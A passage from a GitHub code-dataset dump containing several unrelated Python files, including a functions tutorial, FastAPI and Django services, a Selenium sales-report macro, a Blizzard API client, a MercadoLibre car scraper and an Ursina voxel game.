distance_from_earth(destination):\r\n if destination == 'Moon':\r\n return '238,855'\r\n else:\r\n return 'Unable to compute to that destination'\r\n\r\nprint(distance_from_earth('Moon')) \r\nprint(distance_from_earth('Saturn'))\r\n\r\n#Varios Argumentos\r\ndef days_to_complete(distance, speed):\r\n hours = distance/speed\r\n return hours/24\r\n\r\nprint(round(days_to_complete(238855, 75)))\r\n\r\n#Argumentos de Palabra Clave\r\nfrom datetime import timedelta, datetime\r\n\r\ndef arrival_time(hours=51):\r\n now = datetime.now() #datetime para definir la hor actual\r\n arrival = now + timedelta(hours=hours) #timedelta permite la operación de suma que da como resultado un objeto de hora nuevo\r\n return arrival.strftime('Arrival: %A %H:%M')\r\n\r\nprint(arrival_time())\r\n\r\nprint(arrival_time(hours=0))\r\n\r\n#Combinación de Argumentos\r\nfrom datetime import timedelta, datetime\r\n\r\ndef arrival_time(destination, hours=51):\r\n now = datetime.now()\r\n arrival = now + timedelta(hours=hours)\r\n return arrival.strftime(f'{destination} Arrival: %A %H:%M')\r\n\r\nprint(arrival_time('Moon'))\r\n\r\nprint(arrival_time('Orbit', hours=0.13))\r\n\r\n#Argumentos de Variable\r\ndef variable_length(*args):\r\n print(args)\r\n\r\nprint(variable_length())\r\nprint(variable_length('one', 'two'))\r\nprint(variable_length(None))\r\n\r\n\r\ndef sequence_time(*args):\r\n total_minutes = sum(args)\r\n if total_minutes < 60:\r\n return f'Total time to launch is {total_minutes} minutes'\r\n else:\r\n return f'Total time to launch is {total_minutes/60} hours'\r\n\r\nprint(sequence_time(4, 14, 18))\r\nprint(sequence_time(4, 14, 48))\r\n\r\n#Argumentos de palabras clave variable\r\ndef variable_length(**kwargs):\r\n print(kwargs)\r\nprint(variable_length(tanks=1, day='Wednesday', pilots=3))\r\n\r\ndef crew_members(**kwargs):\r\n print(f'{len(kwargs)} astronauts assigned for this mission:')\r\n for title, name in kwargs.items():\r\n print(f'{title}: {name}')\r\n\r\nprint(crew_members(captain='Neil Armstrong', pilot='Buzz Aldrin', command_pilot='Michael Collins'))","repo_name":"LuisAlvizo/LaunchX_PrimeraMision","sub_path":"09_Funciones/Documentacion09.py","file_name":"Documentacion09.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38727321355","text":"from http import HTTPStatus\n\nfrom aiohttp import ClientError, ClientSession\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom app.core.config import settings\nfrom app.crud.carton import BASE_CARTON, carton_crud\nfrom app.crud.item import item_crud\nfrom app.models import OrderCarton\nfrom app.models.order import Order\n\nSTATUS = '/health'\nPACK = '/pack'\nSTATUS_URL = settings.pack_service_url + STATUS\nPACK_URL = settings.pack_service_url + PACK\n\n\nasync def get_best_pack(\n order: Order,\n data: dict,\n session: AsyncSession\n) -> None:\n \"\"\"Запрашивает лучшую упаковку и сохраняет её в заказ.\"\"\"\n bestpack_data = {'carton': BASE_CARTON}\n try:\n async with ClientSession() as http_session:\n async with http_session.get(STATUS_URL) as response:\n if response.status == HTTPStatus.OK:\n async with http_session.get(\n PACK_URL,\n json=data\n ) as response:\n bestpack_data = await response.json()\n except ClientError as error:\n f'Упаковка не получена. '\n f'Ошибка при выполнении HTTP запроса: {error}'\n if isinstance(bestpack_data, dict):\n cartontype = bestpack_data.get('carton', BASE_CARTON)\n elif isinstance(bestpack_data, list) and bestpack_data:\n cartontype = bestpack_data[0]\n else:\n cartontype = bestpack_data\n carton = await carton_crud.get_carton_by_type(\n cartontype, session\n )\n order_carton = OrderCarton(\n order=order,\n carton=carton,\n amount=1\n )\n session.add(order_carton)\n if 'wrappers' in bestpack_data:\n wrappers = bestpack_data['wrappers']\n for wrapper in wrappers:\n if 'sku' in wrapper and 'wrapper' in wrapper:\n for wrap in wrappers:\n await item_crud.get_wrapper(\n wrap['sku'],\n wrap['wrapper'],\n session\n )\n","repo_name":"40-nog/yandex_hackaton_pack_project","sub_path":"backend/app/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8471220991","text":"from selenium import webdriver\nfrom datetime import date\nfrom datetime import datetime\nimport time\nimport os\nimport random\nprint(\"_______________________________________________\")\nprint(\"*** Made By Park HyungJune copyright @ DevHyung\")\nprint(\">>> This program semi Auto version \")\nprint(\">>> 현대카드 버전\")\nf = open(\"option.txt\", 'r', encoding='utf8')\noption = f.readlines()\nid = option[2].strip()\npw = option[4].strip()\nprint(\">>>ID, PW :: \",id,pw)\ndef hyundae():\n try:\n chromeOptions = webdriver.ChromeOptions()\n prefs = {\"download.default_directory\": os.getcwd() + \"\\현대\"}\n chromeOptions.add_experimental_option(\"prefs\", prefs)\n driver = webdriver.Chrome(executable_path=\"./chromedriver\", chrome_options=chromeOptions)\n driver.maximize_window()\n driver.get('https://www.hyundaicard.com/csa/mb/STOREMAIN.hc')\n time.sleep(5)\n input(\">>> 로그인후 엔터를 눌주세요\")\n xplist = ['//*[@id=\"header\"]/div[2]/div/h1/a','//*[@id=\"container\"]/div[1]/ul/ul[1]/li[4]/dl/dd/ul/li[1]']\n tmpidx = 0\n while True:\n print(\"_\"*30)\n print(\">>> 매일 새벽 6:20 분에 자동으로 작동 시작됩니다.\")\n print(\">>> 작동시작 시간 : \", datetime.now())\n print(\">>> 대기중...\")\n while True:\n # if your start 6:20 below start 6:21\n time.sleep(random.randint(57,60))\n curTime = datetime.now()\n if (curTime.hour == 6 and curTime.minute == 20):\n print(\">>> Try Time : \", curTime)\n print(\">>> 보안프로그램 업데이트 또는, 사이트개편으로 실패한것만 아래에 로그가 남습니다.\")\n tmpidx = 0\n break\n try:\n driver.find_element_by_xpath(xplist[tmpidx%2]).click()\n except:\n driver.find_element_by_xpath(xplist[0]).click()\n tmpidx+=1\n time.sleep(1)\n today = date.today().strftime(\"%Y%m%d\")\n yesterday = date.fromtimestamp(time.time() - 60 * 60 * 24).strftime(\"%Y%m%d\")\n driver.find_element_by_xpath('//*[@id=\"container\"]/div[1]/ul/ul[1]/li[4]/dl/dd/ul/li[1]').click()\n time.sleep(3)\n driver.find_element_by_xpath('//*[@id=\"iqryPrd1\"]').clear()\n driver.find_element_by_xpath('//*[@id=\"iqryPrd1\"]').send_keys(yesterday)\n driver.find_element_by_xpath('//*[@id=\"iqryPrd2\"]').clear()\n driver.find_element_by_xpath('//*[@id=\"iqryPrd2\"]').send_keys(today)\n driver.find_element_by_xpath('//*[@id=\"searchBtn1\"]').click()\n time.sleep(5)\n driver.find_element_by_xpath('//*[@id=\"excelBtn1\"]').click()\n time.sleep(10)\n driver.get('https://www.hyundaicard.com/csa/mb/STOREMAIN.hc')\n except:\n print(\">>> 현대 오류\")\n driver.save_screenshot(os.getcwd()+\"\\현대오류.jpg\")\n driver.quit()\nif __name__==\"__main__\":\n hyundae()\n input()\n","repo_name":"DevHyung/macro-banksite-login","sub_path":"Hyundae.py","file_name":"Hyundae.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36787594696","text":"import os\n\n\nPROJECT_DIR = os.path.dirname(__file__)\n\nDEBUG = True\nSECRET_KEY = \"Your secret key here.\"\n\nOUTPUT_FILENAME = 'output.log'\nUPLOAD_FOLDER = os.path.join(PROJECT_DIR, 'output')\nMAX_CONTENT_LENGTH = 0.1 * 1024 * 1024\n\n\nJOBS_DIR = os.path.join(PROJECT_DIR, 'jobs')\n\n# Timeout out in seconds for each run, None for unlimited\n# (uses timeout command)\nJOBS_TIMEOUT = 30\n\nJOBS = {}\n","repo_name":"matiasb/jaime","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"30733518421","text":"import http, os, sys # tested on python 3.8.5\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\n\nIP=(\"127.0.0.1\") # local web server IP\nPORT=(80) # local web server port\nWWW=(\"joshek-www/\") # directory where files are stored\naddress=(str(IP), PORT) # combined variables for httpServer\nserverURL=(\"http://\"+str(IP)+\":\"+(str(PORT))) # prettyprint the http server URL\n\nhttpServer = HTTPServer(server_address=(IP, PORT), RequestHandlerClass=CGIHTTPRequestHandler) # defines the httpServer object\nos.chdir(WWW) # set current directory as set in the WWW variable\nprint(\"URL: \" + str(serverURL)) # prints a url to the webserver\nprint(\"WWW folder: \" + str(os.getcwd())) # current directory\nprint(\"WWW files: \" + str(os.listdir(\".\"))) # list files in current directory\n\ntry:\n print(\"Starting HTTP server, stop with ^C \\n\")\n httpServer.serve_forever()\nexcept KeyboardInterrupt:\n print(\"Stopping...\")\n exit()\n","repo_name":"SkryptKiddie/codedumps","sub_path":"webServer.py","file_name":"webServer.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"28899731839","text":"# Django\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.conf import settings\n# from django.core.mail import send_mail\n\n\n# send emails with django\nclass MailService:\n \"\"\"\n A class to handle email sending using Django's EmailMultiAlternatives.\n\n This class encapsulates functionalities to compose and send emails with HTML content.\n\n Attributes:\n subject (str): The subject of the email.\n message (str): The main message body of the email.\n to_email (list[str] or str): The list of email addresses to send the email.\n\n Methods:\n __init__(subject, message, from_email, to_email):\n Initializes the MailService instance with necessary email details.\n send_mail_with_html(html_content):\n Sends an HTML-formatted email.\n\n Usage:\n mail_service = MailService(\n 'Subject of the email',\n 'Main message body',\n 'sender@example.com',\n ['recipient1@example.com', 'recipient2@example.com']\n )\n mail_service.send_mail_with_html('

    This is an HTML formatted email.

    ')\n \"\"\"\n\n def __init__(\n self, subject: str,\n to_email,\n message: str = '') -> None:\n \"\"\"\n Initializes the MailService instance.\n\n :param str subject: Subject of the email\n :param str message: Message of the email\n :param list[str] or str to_email: List of emails to send\n \"\"\"\n\n self.subject = subject\n self.message = message\n self.to_email = to_email\n\n if isinstance(self.to_email, str):\n self.to_email = [self.to_email]\n\n if isinstance(self.to_email, list):\n self.to_email = self.to_email\n\n self.fetch_email_service = EmailMultiAlternatives(\n self.subject,\n self.message,\n settings.EMAIL_HOST_USER, # from_email\n self.to_email\n )\n\n def send_mail_with_html(self, html_content) -> None:\n \"\"\"\n Sends an HTML-formatted email.\n\n :param str html_content: HTML content of the email\n \"\"\"\n email = self.fetch_email_service\n\n email.attach_alternative(html_content, \"text/html\")\n email.send()\n print('send email')\n","repo_name":"JuanCarlosAguilarB/ecommerce-project-backend-django","sub_path":"apps/commons/mail_service.py","file_name":"mail_service.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72181414333","text":"from fastapi import APIRouter,Depends\nfrom sqlalchemy.orm import Session\nfrom config.database import get_db\n\nfrom models.parking_spot_model import ParkingSpot\n\nfrom schemas.parking_spot_schema import ParkingSpotSchema\n \nrouter = APIRouter(\n prefix=\"/parking-spot\",\n tags=[\"ParkingSpot\"]\n)\n\n\n@router.get(\"/\")\nasync def get_parking_spot(db:Session = Depends(get_db)):\n data = db.query(ParkingSpot).all()\n return data\n\n@router.post(\"/\")\nasync def add_spot(parkingSpot:ParkingSpotSchema,db:Session = Depends(get_db)):\n \n try: \n # **obj will unpack dict object/ in JS ...data\n spot = ParkingSpot(**parkingSpot.toJson())\n db.add(spot)\n db.commit()\n \n return {\"message\": f\"{spot.spotCode} is Added\"}\n \n except Exception as e:\n raise e\n","repo_name":"Brix101/Parking-Lot-MS","sub_path":"python-server/routes/parking_spot_routes.py","file_name":"parking_spot_routes.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"1362199149","text":"import os\nimport requests\nimport json\nimport config\n\n_CLIENT = config.BZ_OAUTH_CLIENT\n_TOKEN = config.BZ_OAUTH_SECRET\n_region_Name = config.BZ_REGION\n_REGION = {\"id\" : 2 if _region_Name == \"eu\" else 1 if _region_Name == 'us' else 3 if _region_Name == 'kr' else 4, 'name' : _region_Name}\n_BASE_BNET_URL = \"https://{region}.battle.net\".format(region=_REGION['name'])\n_BASE_API_URL = \"https://{region}.api.blizzard.com\".format(region=_REGION['name'])\n\n\ndef get_access_token():\n \"\"\"Gets OAuth access TOKEN\n\n Returns:\n [str]: access token (expires in 24hrs)\n \"\"\"\n url = _BASE_BNET_URL + \"/oauth/token\"\n data = {\"grant_type\": \"client_credentials\"}\n r = post_api(url, data)\n if r.status_code == 200:\n response = json.loads(r.content)\n return response[\"access_token\"]\n return False\n\n\ndef get_player_meta(profileId, regionId=_REGION['id'], realmId=1):\n \"\"\"Returns metadata for an individual's profile.\n\n Args:\n profileId (int): SC2 profile ID (get it in starcraft2.com)\n\n Returns:\n [json]: player meta info\n \"\"\"\n url = _BASE_API_URL + \"/sc2/metadata/profile/{regionId}/{realmId}/{profileId}\".format(regionId=regionId, realmId=realmId, profileId=profileId)\n r = get_api(url)\n if r.status_code == 200:\n response = json.loads(r.content)\n return response\n return r.status_code\n\ndef get_player_info(profileId, regionId=_REGION['id'], realmId=1):\n \"\"\"Returns data about an individual SC2 profile.\n\n Args:\n profileId (int): SC2 profile ID (get it in starcraft2.com)\n\n Returns:\n json: player extended info\n \"\"\"\n url = _BASE_API_URL + \"/sc2/profile/{regionId}/{realmId}/{profileId}\".format(regionId=regionId, realmId=realmId, profileId=profileId)\n return get_api(url)\n\ndef get_ladder_summary(profileId, regionId=_REGION['id'], realmId=1):\n \"\"\"Returns a ladder summary for an individual SC2 profile.\n\n Args:\n profileId (int): SC2 profile ID (get it in starcraft2.com)\n\n Returns:\n [json]: player's ladders summary\n \"\"\"\n url = _BASE_API_URL + \"/sc2/profile/{regionId}/{realmId}/{profileId}/ladder/summary\".format(regionId=regionId, realmId=realmId, profileId=profileId)\n return get_api(url)\n\ndef get_ladder_info(profileId, ladderid, regionId=_REGION['id'], realmId=1):\n \"\"\"Returns data about an individual profile's ladder.\n\n Args:\n profileId (int): SC2 profile ID (get it in starcraft2.com)\n ladderid (int): Ladder unique ID (get it in the player' ladder summary)\n\n Returns:\n [json]: Specific ladder info\n \"\"\"\n url = _BASE_API_URL + \"/sc2/profile/{regionId}/{realmId}/{profileId}/ladder/{ladderId}\".format(regionId=regionId, realmId=realmId, profileId=profileId, ladderId=ladderid)\n return get_api(url)\n\n\ndef post_api(url, data):\n \"\"\"Send POST request to the API\n\n Args:\n url (str): duh!\n data (params): *args\n\n Returns:\n requests: full response\n \"\"\"\n return requests.post(url, auth=(_CLIENT, _TOKEN), data=data)\n\ndef get_api(url):\n \"\"\"Send a GET request to the API, after asking for a new oauth token.\n\n Args:\n url (str): -_-\n\n Returns:\n json: full json response\n \"\"\"\n payload = {\"locale\" : \"en_US\", \"access_token\": get_access_token()}\n r = requests.get(url, params=payload)\n if r.status_code == 200:\n response = json.loads(r.content)\n return response\n return r.status_code\n","repo_name":"gvieralopez/SC2Helperbot","sub_path":"APIs/blizzard.py","file_name":"blizzard.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"13182696680","text":"# Archivo que levanta datos de Mercado Libre ################\n############################################################# \n\npageUrl= \"https://listado.mercadolibre.com.ar/autos-usados\"\ndriver = webdriver.Firefox(executable_path = 'geckodriver')\n\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport sqlite3\nimport pandas as pd\nfrom csv import writer\nfrom datetime import datetime\n\n#Funcion para traer un url de X pagina\ndef get_page_url(pageNumber, marca):\n initial_range = 1 + 48 * (pageNumber - 1)\n base_page_url = \"https://autos.mercadolibre.com.ar/\"\n base_page_url = base_page_url + marca + '/autos-usados_Desde_{}_ITEM*CONDITION_2230581_NoIndex_True'.format(initial_range)\n return base_page_url\n\n#Funcion para traer los objetos de la publicacion\ndef publication_object(car_publication,marca):\n #Obtiene el precio\n price = car_publication.find(class_=\"price-tag-fraction\").text\n price.replace(\".\",\",\")\n \n #Obtiene la moneda\n currency = car_publication.find(class_=\"price-tag-symbol\").text\n \n #Obtiene la ubicación\n ubication = car_publication.find(class_=\"ui-search-item__location\").text\n ubication = ubication.split(\" - \")\n localidad = ubication[0]\n try:\n provincia = ubication[1]\n except:\n provincia = \"\"\n \n #Obtiene el KM\n year = car_publication.find_all(class_=\"ui-search-card-attributes__attribute\")[0].text\n\n #Obtiene el Año\n km = car_publication.find_all(class_=\"ui-search-card-attributes__attribute\")[1].text\n km = km.split(\" \")\n km = km[0]\n \n #Obtiene la marca\n marca = marca\n \n #Obtiene el titulo\n title = car_publication.find(class_=\"ui-search-item__title\").text\n \n #Me devuelve la fecha actual\n current_date = datetime.now().date()\n \n return {\"precio\": price,\n \"currency\": currency,\n \"localidad\": localidad,\n \"provincia\": provincia,\n \"km\": km, \n \"year\": year,\n \"marca\": marca,\n \"title\": title,\n \"visto\": current_date}\n \n \n#Funcion que recorre todas las publicaciones de una pagina\ndef parser_and_save_items(pageUrl,marca):\n #Voy a la pagina que quiero scrapear\n driver.get(pageUrl)\n #Obtengo su HTML\n html_code = driver.page_source\n #Creo un objeto a partir del HTML\n soup = BeautifulSoup(html_code, 'lxml')\n #Trae todas las publiaciones de la pagina actual\n all_publication = soup.find_all(\"li\", class_=\"ui-search-layout__item\")\n \n #Convierte las publicaciones en objetos\n df = pd.DataFrame()\n \n for car_publication in all_publication:\n # print(publication_object(car_publication))\n # Buco los atributos\n data = publication_object(car_publication,marca)\n df_new = pd.DataFrame(data,index = [0])\n df = df.append(df_new, ignore_index = True)\n \n export_data(df)\n print('exportado')\n\n#Funcion para exportar data a un .csv\ndef export_data(df):\n df.to_csv('data_publications.csv',mode='a', sep=';', encoding='utf-8-sig', index=False, header=False)\n \n# Itera por todas las páginas y guarda información en el csv\n\nmarcas = ['volkswagen', 'ford', 'renault', 'peugeot', 'chevrolet', 'toyota', 'fiat', 'audi', 'citroen','audi']\n\nfor marca in marcas:\n for actual_number_page in range(1,35+1):\n \n url_page = get_page_url(actual_number_page,marca)\n print(url_page)\n parser_and_save_items(url_page,marca)\n\n# Para levantar la URL de la imagen\n# img = car_publication.find('img')\n\n# try:\n# img_url = all_house_li[0].find('img')['data-src']\n# except:\n# img_url = all_house_li[0].find('img')['src']\n","repo_name":"lucialopezwallace/tesis-mim","sub_path":"meli-scrapper.py","file_name":"meli-scrapper.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31278590364","text":"from datetime import date\nimport requests\n\nfrom core.models import Answer, AnswerEvaluation\nfrom utils.convertDate import convertDate\n\n\nclass AnswerService:\n @staticmethod\n def getAnswersOfQuestion(questionId):\n answers = Answer.objects.filter(question_id=questionId, status='ACCEPTED').order_by('-created_at')\n for answer in answers:\n answer.created_at = convertDate(answer.created_at)\n answer.evaluations = AnswerEvaluation.objects \\\n .filter(answer_id=answer.id) \\\n .values('user_id', 'evaluation_type')\n\n userResponse = requests.get(f'http://127.0.0.1:8000/api/users/{answer.user_id}/owner-info')\n user = userResponse.json()['data']\n answer.user = user\n return answers\n\n @staticmethod\n def createAnswer(data):\n answer = Answer.objects.create(\n user_id=data['user_id'],\n question_id=data['question_id'],\n content=data['content'],\n reference=data['reference'],\n image=data['image'],\n status='WAITING',\n created_at=date.today()\n )\n answer.created_at = convertDate(answer.created_at)\n answer.evaluations = AnswerEvaluation.objects \\\n .filter(answer_id=answer.id) \\\n .values('user_id', 'evaluation_type')\n\n userResponse = requests.get(f'http://127.0.0.1:8000/api/users/{answer.user_id}/owner-info')\n user = userResponse.json()['data']\n answer.user = user\n\n return answer\n\n @staticmethod\n def createOrUpdateEvaluation(answerId, userId, evaluationType):\n if AnswerEvaluation.objects.filter(answer_id=answerId, user_id=userId).exists():\n AnswerEvaluation.objects.filter(answer_id=answerId, user_id=userId) \\\n .update(evaluation_type=evaluationType)\n return 'Update success'\n else:\n AnswerEvaluation.objects.create(answer_id=answerId, user_id=userId, evaluation_type=evaluationType)\n return 'Create success'\n\n @staticmethod\n def getAnswersOfQuestionOrderByNewest(questionId, pageNumber):\n totalRecords = Answer.objects.filter(question_id=questionId).count()\n\n page_size = 6\n offset = (pageNumber - 1) * page_size\n limit = offset + page_size if offset + page_size <= totalRecords else totalRecords\n\n answers = Answer.objects.filter(question_id=questionId).order_by('-created_at', '-status')[offset:limit]\n\n return answers\n\n @staticmethod\n def getDetailAnswerById(answerId):\n answer = Answer.objects.get(id=answerId)\n return answer\n\n @staticmethod\n def countAnswersOfQuestion(questionId):\n return Answer.objects.filter(question_id=questionId).count()\n\n @staticmethod\n def deleteAnswerForever(answerId):\n Answer.objects.filter(id=answerId, status=\"WAITING\").delete()\n\n @staticmethod\n def updateAnswerStatus(answerId):\n Answer.objects.filter(id=answerId, status=\"WAITING\").update(status=\"ACCEPTED\")\n\n @staticmethod\n def getAllAnswer():\n answers = Answer.objects.all()\n return answers\n\n @staticmethod\n def getPendingAnswer():\n question = Answer.objects.filter(status=\"WAITING\")\n return question\n","repo_name":"HTTT-MDM-DA/viet-intel-social","sub_path":"server/answer/core/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14501159897","text":"from typing import List\n\n\nclass state:\n def __init__(self, v= ''):\n self.value = v\n self.distance = 0 #define as amount of different letters\n self.children = []\n self.step = 0\n def setDistance(self, target):\n dis = 0\n if len(self.value) != len(target.value) :\n return None\n for i in range(len(self.value)):\n if self.value[i] != target.value[i] :\n dis += 1\n self.distance = dis\n return self.distance\n\n def calDistance(self, otherString):\n dis = 0\n if len(self.value) != len(otherString) :\n return None\n for i in range(len(self.value)):\n if self.value[i] != otherString[i] :\n dis += 1\n return dis\n\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n if endWord not in wordList :\n return 0\n wordList.remove(endWord)\n startState = state(endWord)\n startState.step = 1\n endState = state(beginWord)\n startState.setDistance(endState)\n stack = []\n stack.append(startState)\n while stack and wordList:\n top = stack[0]\n stack = stack[1:]\n index = 0\n while index < len(wordList) :\n if top.calDistance(wordList[index]) == 1 :\n newState = state(wordList[index])\n newState.step = top.step+1\n newState.setDistance(endState)\n if newState.distance == 1:\n return newState.step\n top.children.append(newState)\n stack.append(newState)\n del wordList[index]\n else:\n index += 1\n return 0\n\nif __name__ == '__main__':\n ss = Solution()\n print(ss.ladderLength(\"hit\",\"cog\",[\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]))","repo_name":"UnbearableFate/exercises","sub_path":"leetcode_127_medium/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22904402408","text":"from ursina import *\r\nfrom ursina.prefabs.first_person_controller import FirstPersonController\r\n\r\napp = Ursina()\r\ngrass_texture = load_texture('assets/grass_block.png')\r\nstone_texture = load_texture('assets/stone_block.png')\r\nwood_texture = load_texture('assets/wood_block.png')\r\ndirt_texture = load_texture('assets/dirt_block.png')\r\nblock_pick = 1\r\nblocks=[\"\",\"Grass\",\"Stone\",\"Wood\",\"Dirt\"]\r\nwindow.fps_counter.enabled = False\r\nwindow.borderless = False\r\nwindow.exit_button.visible = False\r\nwindow.title = 'PyCraft'\r\ndef update():\r\n\tglobal block_pick\r\n\r\n\tText.default_resolution = 1080 * Text.size\r\n\r\n\r\n\tif held_keys['1']: block_pick = 1\r\n\tif held_keys['2']: block_pick = 2\r\n\tif held_keys['3']: block_pick = 3\r\n\tif held_keys['4']: block_pick = 4\r\n\tif held_keys['5']: block_pick = 5\r\n\tif held_keys['tab']:\r\n\t\t mouse.locked = False\r\n\tif held_keys['enter']:\r\n\t\tmouse.locked = True\r\n\tif held_keys['escape']: app.quit()\r\nclass Voxel(Button):\r\n\tdef __init__(self, position = (0,0,0), texture = grass_texture):\r\n\t\tsuper().__init__(\r\n\t\t\tparent = scene,\r\n\t\t\tposition = position,\r\n\t\t\tmodel = 'assets/block',\r\n\t\t\torigin_y = 0.5,\r\n\t\t\ttexture = texture,\r\n\t\t\tcolor = color.color(0,0,random.uniform(0.9,1)),\r\n\t\t\tscale = 0.5)\r\n\r\n\tdef input(self,key):\r\n\t\tif self.hovered:\r\n\t\t\tif key == 'left mouse down':\r\n\t\t\t\tif block_pick == 1: voxel = Voxel(position = self.position + mouse.normal, texture = grass_texture)\r\n\t\t\t\tif block_pick == 2: voxel = Voxel(position = self.position + mouse.normal, texture = stone_texture)\r\n\t\t\t\tif block_pick == 3: voxel = Voxel(position = self.position + mouse.normal, texture = wood_texture)\r\n\t\t\t\tif block_pick == 4: voxel = Voxel(position = self.position + mouse.normal, texture = dirt_texture)\r\n\t\t\tif key == 'right mouse down':\r\n\t\t\t\tdestroy(self)\r\n\r\nfor z in range(20):\r\n\tfor x in range(20):\r\n\t\tvoxel = Voxel(position = (x,0,z))\r\n\r\nplayer = FirstPersonController()\r\n\r\napp.run()\r\n","repo_name":"leodev12345/pycraft","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21874689310","text":"# 본인은 어렵게 구현했지만, 사실 선행되어야 하는 과제가\n# 앞에 나온 과제들로 구성되어 있기 때문에\n# 받아와서 바로 길이를 구성하면 된다.\n# 그러면 연결도 안 해도 되고 해싱도 할 필요가 없다.\n\nfrom collections import deque\nimport sys\n\ninput = sys.stdin.readline\nn = int(input())\nlink = [set() for _ in range(n)]\nlink_reverse = {}\nlink_count = [0] * n\ntime = [0] * n\ndp = [0] * n\nq = deque()\nfor i in range(n):\n num_and_list = list(map(int, input().split()))\n time[i] = num_and_list[0]\n link_count[i] = num_and_list[1]\n if link_count[i] == 0:\n q.append(i)\n for j in range(link_count[i]):\n obj_link = num_and_list[2 + j] - 1\n link[obj_link].add(i)\n link_reverse[i] = set(map(lambda X: X - 1, num_and_list[2:]))\nresult = 0\n\nwhile q:\n core = q.popleft()\n pre_max = 0\n for pre in link_reverse[core]:\n pre_max = max(pre_max, dp[pre])\n dp[core] = pre_max + time[core]\n if dp[core] > result:\n result = dp[core]\n for next_link in link[core]:\n link_count[next_link] -= 1\n if not link_count[next_link]:\n q.append(next_link)\nprint(result)","repo_name":"Rekalux/Algorithm-etc","sub_path":"Only Algorithm/Year2021/Day0309/Boj_2056.py","file_name":"Boj_2056.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13339660943","text":"import random\nfrom turtle import Turtle\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\nWIDTH = 1\nHEIGHT = 2\n\n\nclass CarManager:\n\n def __init__(self):\n self.all_cars = []\n self.speed = STARTING_MOVE_DISTANCE\n\n def create_car(self):\n random_chance = random.randint(1, 6)\n if random_chance == 1:\n new_car = Turtle()\n new_car.shape(\"square\")\n new_car.shapesize(stretch_wid=WIDTH, stretch_len=HEIGHT)\n new_car.color(random.choice(COLORS))\n new_car.penup()\n rand_y = random.randint(-250, 250)\n new_car.goto(300, rand_y)\n self.all_cars.append(new_car)\n\n def move_car(self):\n for car in self.all_cars:\n car.backward(self.speed)\n\n def up_speed(self):\n self.speed += MOVE_INCREMENT\n","repo_name":"dzmitryboika1/the_turtle_crossing_capstone_game","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73089304571","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom django.conf.urls import patterns\nfrom django.conf.urls import url\n\nfrom openstack_dashboard.dashboards.project.stacksd import views\n\nurlpatterns = patterns(\n '',\n url(r'^$',views.IndexView.as_view(), name='index'),\n url(r'^get_d3_data/(?P[^/]+)/$',\n views.JSONView.as_view(), name='d3_data'),\n url(r'^formI/(?P[^/]+)/$',views.InstanceFormView.as_view(), name='formI'),\n url(r'^formD/(?P[^/]+)/$',views.DatabaseFormView.as_view(), name='formD'),\n url(r'^formLB/(?P[^/]+)/$',views.LoadBalancerFormView.as_view(), name='formLB'),\n url(r'^create/(?P\\d+)/$',views.ResourcesView.as_view(), name='create'),\n url(r'^del/(?P[^/]+)/$',views.RemoveNode.as_view(), name='del'),\n)\n","repo_name":"SujayBothe/Template-Generator","sub_path":"stacksd/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20274658410","text":"from collections import defaultdict\nimport re\n\ndef strip_comments(c):\n return re.sub(r'^\\s*;.+\\n', '', c, flags=re.MULTILINE)\n\ndef strip_newlines(c):\n return 